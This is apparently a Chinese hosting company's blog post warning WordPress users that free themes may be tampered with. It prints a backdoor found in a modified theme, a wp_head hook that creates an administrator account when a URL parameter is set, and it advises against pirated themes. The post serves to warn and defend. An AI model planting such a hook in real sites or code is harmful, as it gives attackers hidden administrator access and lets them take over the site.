使用wordpress建站的站长朋友们不在少数，无忧主机php虚拟主机就有很多wordpress的客户。一般我们使用wordpress建站，都是先安装一个开源程序，然后到网上选择一个我们喜欢或者适合的主题，进行安装。这些主题中，大部分都是免费的主题。这就可能涉及到一个问题，那就是安全问题。由于免费的主题大家都可以下载到，一些无良的商家专门收集这些主题，往主题里添加广告、暗链，甚至恶意代码，达到他们不可告人的秘密。最近无忧主机小编就遇到了这样一个被人修改过的主题，添加的代码如下：

add_action('wp_head', 'holeinthewall'); 
function holeinthewall() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('username')) { 
$user_id = wp_create_user('username', 'password'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
}

以上主题小编请公司的程序员大神解释了一下，他给出的解释是：这竟然是一个自动添加管理员的代码！如果把上面的代码添加到functions.php文件中，会自动创建一个管理员，名为username，密码为password的管理账号！这样太恐怖了，如果真的创建成功，就可以任意修改网站内容了。 所以无忧主机小编在这里给大家提个醒：最好不要使用免费或者盗版的主题，以免给自己的网站带来意想不到的麻烦。 无忧主机相关文章推荐阅读： WORDPRESS利用插件让后台变为中文 WORDPRESS让用户随心所欲的调整网页字体大小 WORDPRESS网站迁移中文名称的图片不显示原因分析

本文地址：https://www.51php.com/wordpress/19692.html

上一篇: 使用什么模块能检测Drupal的安全配置
下一篇: WordPress自动保存功能的利弊及取消方法